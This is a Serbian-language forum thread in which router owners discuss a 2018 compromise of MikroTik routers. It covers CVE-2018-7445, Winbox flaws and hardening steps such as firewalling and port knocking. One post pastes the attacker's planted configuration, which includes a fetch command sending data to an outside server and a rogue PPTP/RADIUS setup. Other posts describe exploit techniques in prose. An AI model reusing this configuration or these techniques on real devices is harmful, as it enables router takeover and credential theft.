[ zecos @ 15.06.2018. 17:59 ] @
U toku danasnjeg dana hakovan mi je mikrotik ruter, nije mi poznato kako je do toga doslo, uglavnom, primetih da mi je ssh aktivan iako znam da sam ga iskljucio, kasnije sam i nasao da je dodata skripta koja redovno na sajt salje user i pass na jedan server... Dodata jos jedna skripta pod nazivom PPOE, iskreno nisam stigao da gledam sta radi... Nemam predstavu na koji nacin bi dosli do sifre, random je sa velikim i malim slovima brojevima... sem ako nije nekako "uhvacena"
Za pristup mikrotiku sam koristio tikapp za android koja bi trebao da je oficialna aplikacija, ne vidim drugi nacin, sem nje...
Log-ovi su pobrisani bili uglavnom po uptime, sve se desilo oko 16h

Obratite paznju na tu verziju, mozda je ranjiva!
[ dragansar @ 15.06.2018. 18:16 ] @
A vulnerability exists in MikroTik's RouterOS in versions prior to the latest 6.41.3, released Monday, March 12, 2018. Details were discovered February and disclosed by Core Security on Thursday.

MikroTik is a Latvian manufacturer that develops routers and software used throughout the world. RouterOS is its Linux-based operating system.

The vulnerability, a MikroTik RouterOS SMB buffer overflow flaw, allows a remote attacker with access to the service to gain code execution on the system. Since the overflow occurs before authentication, an unauthenticated remote attacker can exploit it.
Remotely Exploitable Vulnerability Discovered in MikroTik's RouterOS
The vulnerability exists because the first byte of the source buffer is read and used as the size for the copy operation to the destination buffer -- but ultimately, no validation is performed to ensure that the data fits into the destination buffer, potentially allowing a stack overflow.

Core's vulnerability advisory includes a proof of concept exploit against MikroTik's x86 Cloud Hosted Router. The function is reached by sending a NetBIOS session request message. Data execution prevention (DEP) is bypassed with a return-oriented programming (ROP) chain that calls 'mprotect' to mark a memory region as both writable and executable. Address space layout randomization (ASLR) can be neutralized because the base address of the heap is not randomized. This allows a payload on the heap to jump to a fixed location.

"Our testing," says Core's advisory, "showed this approach to be extremely reliable." The reserved CVE number is CVE-2018-7445.

Core sent its initial vulnerability notice to MikroTik on February 19, 2018. On the same day, Core noticed the flaw was already scheduled for a fix by MikroTik in a new software release candidate. Core asked for a coordinated publication of the new version and its own advisory. It proposed March 1, 2018, which was confirmed by MikroTik. MikroTik then asked for an extension to Thursday, March 8, 2018, and then told Core it still wouldn't be ready.

On Monday, March 12, 2018, it released the new version. It did not inform Core, and there is no apparent mention of the flaw or the fix in its new version announcement to customers -- but it subsequently confirmed that the flaw has been fixed. MikroTik's advice for customers that cannot upgrade is that they should turn off SMB.

Last week, Kaspersky Lab released a report on a hacking group it calls Slingshot. It has identified around 100 victims. The attackers gain access by first getting control of MikroTik routers, and using that position to download DLL files to the target computer via MikroTik's Winbox management tool.

It is not clear at this point whether the Slingshot group gained access to the MikroTik routers using the CVE-2018-7445 vulnerability, but it is tempting to think so. Kaspersky Lab informed the company about its research prior to its own publication.

While the router vulnerability would be the first stage of the attack, the second stage would be the use of Winbox to get the malicious downloads. MikroTik claims on its support forum that Winbox is secure. In a thread started by a customer disturbed at learning about Slingshot from reports in the media rather than from MikroTik, MikroTik responded, "There is NO insecure Winbox v3. Winbox v3 was released in 2014. Even if somebody was using a really old Winbox v2, they still had to have an unsecured RouterOS device so that somebody could compromise it (firewall had to be removed). This is why they found only 120 affected machines since 2012."

The bottom line is that MikroTik is quick fix to issues it knows about, but prefers to maintain a low profile over those problems. The danger here is that existing customers might not be aware of the issues, and be in no hurry to upgrade. MikroTik customers should be aware that a proven proof of concept exploit for vulnerability CVE-2018-7445 is in the public domain, and the 'patch' for this exploit is to upgrade RouterOS to version 6.41.3
[ zecos @ 15.06.2018. 18:23 ] @
Zanimljivo... nisam obracao paznju....
Uglavnom, sistem updated, user i pass promenjeni, trebam li jos na nesto obratiti paznju?

Hvala
[ dragansar @ 15.06.2018. 18:30 ] @
Mislim da bi trebalo da definises sa kojih se adresa moze prici 8291 portu i svim ostalim koje koristis za remote pristup.Plus mislim da ti je u tom MT-u napravljena skripta koja je slala user podatke na neku lokaciju...pa predpostavljam da isti podaci mogu biti posle upotrebljeni za pristup nekom od tvojih drugih Mt-a...ili ce mozda biti dodana na neku listu, pa kad oni silni botovi pokusavaju da se uloguju sa raznim konbinacijama user-a i pass-a
[ Zlatni_bg @ 16.06.2018. 00:04 ] @
Blic pitanje:

Odredjena ARM jezgra i dosta ostalih su podlozna Spectre/Meltdown napadima, bez patcha. Da nije to slucaj?
[ Branimir Maksimovic @ 16.06.2018. 06:18 ] @
Nije za to ti vec treba pristup masini.
[ zecos @ 16.06.2018. 08:26 ] @
Skriptu sam obrisao bila je napravljena, slala je user i pass svakih ne znam koliko vremena na www.boss-ip.com na njemu samo iis7 logo i zabranjen pristup folderima... nisam se dalje zamarao trazenjem, jer ako vec zna ovo sve da uradi, ne sumnjam da identitet nije sakrio... uglavnom, trenutno ne mogu da definisem adrese, ruteru pristupam iskljucivo sa wan strane posto sam van drzave, i imam dinamicku ip adresu... ostali ruteri su mi trenutno offline, "odsekao" sam ih tako da me oni ne brinu... ostao je samo ovaj glavni zbog interneta po kuci i vpn-a zbog inostranstva :)
[ bachi @ 16.06.2018. 08:28 ] @
Ne znam zašto držite menadžment portove otvorenim ka celom Internetu? Ovo nije prvi put, a neće biti ni poslednji pa MT ima probleme ovakvog tipa.
[ Living Light @ 16.06.2018. 08:47 ] @
Citat:
zecos:slala je user i pass svakih ne znam koliko vremena na www.boss-ip.com

Kad kliknem na njih, bude ovo:
[ bachi @ 16.06.2018. 08:48 ] @
Imaju miner na tom sajtu. :D :D :D
[ Living Light @ 16.06.2018. 08:52 ] @
Vladimire, da ti oma rečem, ja nemam pojma o čemu ti pričaš:
"Ne znam zašto držite menadžment portove otvorenim ka celom Internetu?"

Jer se u to ič ne razumem.

Kako ja da znam da li su mi ti pomenuti portovi otvoreni ili ne ?

Aj pomagaj, ali onako "kao za budalu", molim te.
[ Branimir Maksimovic @ 16.06.2018. 09:00 ] @
pa probas da se telnetujes (recimo sa putty-jem) na neki port preko spoljnog ip-a ili ako imas ddns preko domena ;)
portovi koje probas su 80, 443, 22 i 23.
[ Living Light @ 16.06.2018. 09:04 ] @
Joj bre ljudi, oznojio sam se načisto.
Ništa Vas ja ne razumem.

Ok, jasno mi je, nisam ja ni toliko bitan,
valjda to razumeju ostali sagovornici i čitaoci teme.
[ bachi @ 16.06.2018. 09:46 ] @
Jednostavno je. Firewall pravilom (koje po defaultu i jeste takvo), zabranjuje se input (dolazni) saobraćaj na sam Mikrotik (osim ICMP saobraćaja). Samim tim, čak i ako MT ima neku sigurnosnu manu, a imao ih, ima i imaće ih, kako niko spolja ne može da priđe da ga administrira, ne može ni da iskoristi taj propust.

Mene zanima zašto ljudi kroz firewall dozvoljavaju da bilo ko sa Interneta može da administrira Mikrotik ruter?
[ Living Light @ 16.06.2018. 10:17 ] @
Sad već počinjem da vatam konce.
Hvala Vladimire.

Svako dobro.
[ Branimir Maksimovic @ 16.06.2018. 10:29 ] @
Citat:
bachi:
Jednostavno je. Firewall pravilom (koje po defaultu i jeste takvo), zabranjuje se input (dolazni) saobraćaj na sam Mikrotik (osim ICMP saobraćaja). Samim tim, čak i ako MT ima neku sigurnosnu manu, a imao ih, ima i imaće ih, kako niko spolja ne može da priđe da ga administrira, ne može ni da iskoristi taj propust.

Mene zanima zašto ljudi kroz firewall dozvoljavaju da bilo ko sa Interneta može da administrira Mikrotik ruter?


Pa kolko vidim OP pristupa ruteru iz inostranstva te sa te strane mora da otvori neke servise.
[ bachi @ 16.06.2018. 10:48 ] @
Da, servis koji treba da otvori jeste VPN server, da se kači VPNom na ruter i onda ga administrira.
[ Branimir Maksimovic @ 16.06.2018. 10:50 ] @
Pretpostavljam da konfigurisanje vpn-a nije tako jednostavno kao otvaranje ssh porta ;P
Ali svakako da OP ubuduce treba tako da radi da ne bi dolazilo do slicnih iznenadjenja ;p
[ linux_wlan @ 16.06.2018. 10:59 ] @
Kako si obrisao skriptu ako je hackovan "kako treba" verovatno ne mozes da mu pridjes sa poznatim user/pass i da se ulogujes na njega.
[ bachi @ 16.06.2018. 11:01 ] @
Citat:
Branimir Maksimovic:
Pretpostavljam da konfigurisanje vpn-a nije tako jednostavno kao otvaranje ssh porta ;P
Ali svakako da OP ubuduce treba tako da radi da ne bi dolazilo do slicnih iznenadjenja ;p

Nije naravno. Ako već se otvara pravilo, makar ga ograničiti da može sa određene ip adrese da se pristupa ili makar na nivou ISPa ili te zemlje, a i SSH/winbox da sluša na drugom nekom drugom portu, a ne na podrazumevanom isto tako pomaže.
[ Branimir Maksimovic @ 16.06.2018. 11:15 ] @
Da da, pogotovo to. Ja sam otvorio ssh na nestandardnom portu i za godinu dana nisam imao nijedan pokusaj upada. A na 8080 vrtim neki svoj web koji samo vraca hello world i belezi ko sve pokusava da se nakaci i da vidis tu na 8080 koji je standardan port tusta i tma pokusaja hakovanja ;)
[ DynDNS @ 16.06.2018. 13:45 ] @
Zašto ne koristite jednu vrlo zgodnu opciju ?
Svi portovi su zatvoreni ka internetu a otvarate ih kada vam zatreba.
[ bachi @ 16.06.2018. 15:30 ] @
Kako ih otvoriš spolja?
[ DynDNS @ 16.06.2018. 16:16 ] @
Prozivanjem odredjenih portova, odredjenim REDOSLEDOM, sa ISTE source adrese, vremenski razmak prozivanja portova "do X sekundi" ruter kreira firewall allow pravilo koje traje xx minuta za odredjeni port samo za TU SOURCE adresu.

Mogu kasnije postaviti code za mtik.
[ bachi @ 16.06.2018. 16:40 ] @
U jeeeee, nisam znao za to.
[ Branimir Maksimovic @ 16.06.2018. 16:51 ] @
Meni samo nije jasno kako korisnik da uradi to prozivanje ;p
[ milosbeo @ 16.06.2018. 17:04 ] @
^^
kljucna rec: port knocking :)

To je vec next level :)

Razbijen je winbox port, tako da napadac pristupi bazi sa passwordima...
Ili poslednja verzija softvera ili jos bolje firewall.
[ bachi @ 16.06.2018. 17:21 ] @
Hvala, svaki dan naučim po nešto novo. :D
[ DynDNS @ 16.06.2018. 18:09 ] @
Prozivanje može da se ostvari iz brousera, raznih programa za pc, android, ios.....
[ zecos @ 16.06.2018. 19:11 ] @
Citat:
linux_wlan:
Kako si obrisao skriptu ako je hackovan "kako treba" verovatno ne mozes da mu pridjes sa poznatim user/pass i da se ulogujes na njega.


Sifra nije bila promenjena, u veoma kratkom vremenu sam primetio...
[ linux_wlan @ 16.06.2018. 19:22 ] @
Nije dobro haknut cim je ostao user/pass nepromenjen

[Ovu poruku je menjao linux_wlan dana 16.06.2018. u 20:45 GMT+1]
[ zivanicd @ 16.06.2018. 21:53 ] @
Sto pominje DynDNS:

Prvo odaberes portove i redosled :) (recimo 5555,6666,5566)
Napravi da input ka tim portovima generise neke dynamicke liste (address-list).
Pa uradis sa telefona/kompa/tableta... telnet prvo na port 5555, tvoja IP adresa se upise u listu pristup5555, isto tako i za ostale liste...

Onda napravi pravilo:
sve sto dolazi na prvu listu, prelazi u stage2, pa sto dolazi u drugu prelazi u stage3 pa sto dolazi u trecu prelazi u stage4. Nakon faze 4 stavis ACCEPT za mikrotik i pristupas mu kako hoces...

Unazad ovo pravilo sluzi za neki antispam/antiddos i sl...

Lepo i elegantno...

Naravno ozbiljan administrator ce svoju mrezu zastititi prvo spolja a posle i od svojih korisnika...

Nisam ulazio u problematiku ovog remote exploita, ali vidim da ima veze sa SMB portom koji je inace oduvek bio problematican i za te portove su vezani gomila exploitova. Ko se seca legentarnog TEARDROP-a koji nam je oslobadjao pristupne linije Telekoma/PTT-a/YUBC-a/Beotela i YUPAK-a zna o cemu pricam :)

SMB je bezvezna stvar na mikrotiku.


[ DynDNS @ 16.06.2018. 21:55 ] @
Code:



/ip firewall filter   

add chain=input action=add-src-to-address-list address-list="Knock1" address-list-timeout=05s comment="Knock1 list - 05s" dst-port=48962 protocol=udp in-interface=ether1

add chain=input action=add-src-to-address-list address-list="Knock2" address-list-timeout=05s comment="Knock2 list - 05s" dst-port=57236 protocol=tcp src-address-list="Knock1" in-interface=ether1 

add chain=input action=add-src-to-address-list address-list="Knock3" address-list-timeout=05s comment="Knock3 list - 05s" dst-port=26786 protocol=udp src-address-list="Knock2" in-interface=ether1 

add chain=input action=add-src-to-address-list address-list="Safelist" address-list-timeout=10m comment="Safelist - 10m" dst-port=13897 protocol=tcp src-address-list="Knock3" in-interface=ether1  

add chain=input action=accept comment="Accept 80,22,8921 from IPs in Safe list" dst-port=80,22,8291 protocol=tcp src-address-list="Safelist" in-interface=ether1


Da pojasnim :

chain prvi osluskuje po udp portu 48962 prozivku. Kada se prozvka dogodi source adresu ubacuje u knock1 listu na 5 sekundi.

chain drugi osluskuje po tcp portu 57236 prozivku, kada se prozivka dogodi source adresu ubacuje u knock2 listu na 5 sekundi. Ali ovaj chain ima pravilo i da samo Knock1 lista ima allow da prozove port iz ovog chaina.

chain 3 : isto kao i chain 2

chain 4 isto kao i predhodna dva. Samo sto sam ja stavio ime liste Safelist u kojoj se source adresa zadrzava 10 minuta.

chain 5 : mislim da je jasan.

Naravno, template oblikujte svojim potrebama, postavite neke randum portove...
Takodje dodajte chain-ove da je ruter potpuno nevidljiv na internetu.




Pozdrav


[Ovu poruku je menjao DynDNS dana 16.06.2018. u 23:15 GMT+1]
[ Living Light @ 16.06.2018. 22:01 ] @
Izvinjavam se što kasnim sa "Roditeljskog"
Obećavam, da ću sve pomno i detaljno pročitati

(kačim cveće ispred zgrade,
bušim betonske grede, uvaljujem hilti tiplove, itd,)

-volim da je lepo ako može
[ Aleksandar Đokić @ 16.06.2018. 23:57 ] @
@zivanicd

Nije neka filozofija za exploit. Prvi bajt definise velicinu source bafera, a nema provere da li moze da stane u destinacioni bafer, sto omogucava stack overflow.
[ zastava10 @ 18.06.2018. 15:21 ] @
Dakle ovako:

Ovo isto se desilo i meni u isto vreme, znaci pre 3 dana.
Posto se napad desio u isto vreme, mogu da smatram da je ovo dobro organizovano i da nije slucajno

Za pristup Mikrotiku koristio sam Winbox, u lokalu i sa Interneta.

Posledice su sledece:

Dodat je script:

/tool fetch url=("http://www.boss-ip.com/Core/Update.ashx\
?key=85454d8bb84998fa&action=upload&sncode=434017A7560235760C99A0FA08D602C5&dynamic=static")}

Nisam zapamtio koliko cesto se aktivirao.

Izmenjeno je ime routera:

set name=test

Dodato je sledece:

add name=pool1 ranges=10.1.1.2-10.1.1.250

/ppp profile
add change-tcp-mss=yes dns-server=8.8.8.8 local-address=10.1.1.1 name=test \
remote-address=pool1 use-encryption=yes

/interface pptp-server server
set authentication=pap,chap default-profile=test enabled=yes

add action=masquerade chain=srcnat
add action=masquerade chain=srcnat

/ppp aaa
set interim-update=1m use-circuit-id-in-nas-port-id=yes use-radius=yes

/radius
add address=47.75.230.175 secret=test service=ppp
add address=47.75.230.175 secret=test service=ppp
/radius incoming
set accept=yes







[Ovu poruku je menjao zastava10 dana 18.06.2018. u 16:33 GMT+1]

[Ovu poruku je menjao zastava10 dana 18.06.2018. u 16:37 GMT+1]
[ Aleksandar Đokić @ 18.06.2018. 22:39 ] @
Meni ovo sve lici na ovaj novi VPNFilter malver.

Po poslednjim informacijama ovi modeli su ugrozeni:
Code:
Mikrotik Devices:
CCR1009 (new)
CCR1016
CCR1036
CCR1072
CRS109 (new)
CRS112 (new)
CRS125 (new)
RB411 (new)
RB450 (new)
RB750 (new)
RB911 (new)
RB921 (new)
RB941 (new)
RB951 (new)
RB952 (new)
RB960 (new)
RB962 (new)
RB1100 (new)
RB1200 (new)
RB2011 (new)
RB3011 (new)
RB Groove (new)
RB Omnitik (new)
STX5 (new)
[ zastava10 @ 19.06.2018. 08:31 ] @
Router kod mene je RB3011 UiAS.

Ja sam posle ovog napada uradio update na verziju 6.42.3 koja je datirana na 24.05.2018

Vratio sam iz backupa "zdravu" konfiguraciju.

Promenio sam password.

Iskljucio sam www, www-ssl, api, api-ssl, ssh servise jer ih ne koristim.

Ostavio sam ftp, telnet i winbox koje sam stavio u address listu sa koje moze da se pristupa.


[ linux_wlan @ 19.06.2018. 11:11 ] @
E ostavio si prave servise za kara*je. Da si birao ne bi bolje izabrao.
[ Living Light @ 19.06.2018. 11:14 ] @
BRAVO Alexandre,
i nek si mu rekao:

"ostavio si prave servise za kara*je. Da si birao ne bi bolje izabrao."

To, to, to, direkt u Target,
[ npero @ 19.06.2018. 11:49 ] @
Svi modeli sa starijim softverom su ugrozeni onaj spisak gore nista ne znaci svi modeli koriste indentican softver tako da na taj spisak slobodno moze da se doda sve sto su ikada proizveli da se na njemu vrti MT, plus x86 a da je verzija ispod te neke zakrpljene.
Znaci ukoliko Vas model nije na spisku JESTE ugrozen updetujete ili podesite firewall da nema pristupa preko WinBox spolja.
[ Aleksandar Đokić @ 19.06.2018. 21:59 ] @
Imas pravo,

plus dd-wrt i ti derivati.

Jel neko uopste ukapirao kako se siri ovaj malver? Svuda iznapisali sta i kako radi, stage-eve itd a nigde otkud na ruteru.

Jesu neki 0day-evi, o cemu je rec?
[ zastava10 @ 20.06.2018. 10:53 ] @
https://forum.mikrotik.com/viewtopic.php?t=135762

[ Aleksandar Đokić @ 20.06.2018. 11:28 ] @
Pogleo sam te teme, nema niceg pametnog.
[ cukovanny @ 22.09.2018. 00:14 ] @
evo kolege, prilično detaljno objašnjeno:


https://n0p.me/winbox-bug-dissection/


suština je da su se mikrotik koderi oslonili na winbox client da "proziva" listu fajlova koja se skida prilikom sinhronizacije *.DLL izvršnih fajlova koje se kopiraju u trenutku kada MPROXY servis na target mikrotiku (winbox) zaključi da vam trebaju novi DLL.
lažira se session id i podesi custom lista fajlova koje vučeš i eto ti sve što ti treba BEZ autentikacije na target ruter.
alati za dekripciju preuzetih datoteka postoje već godinama - https://github.com/0ki/mikrotik-tools

poz svima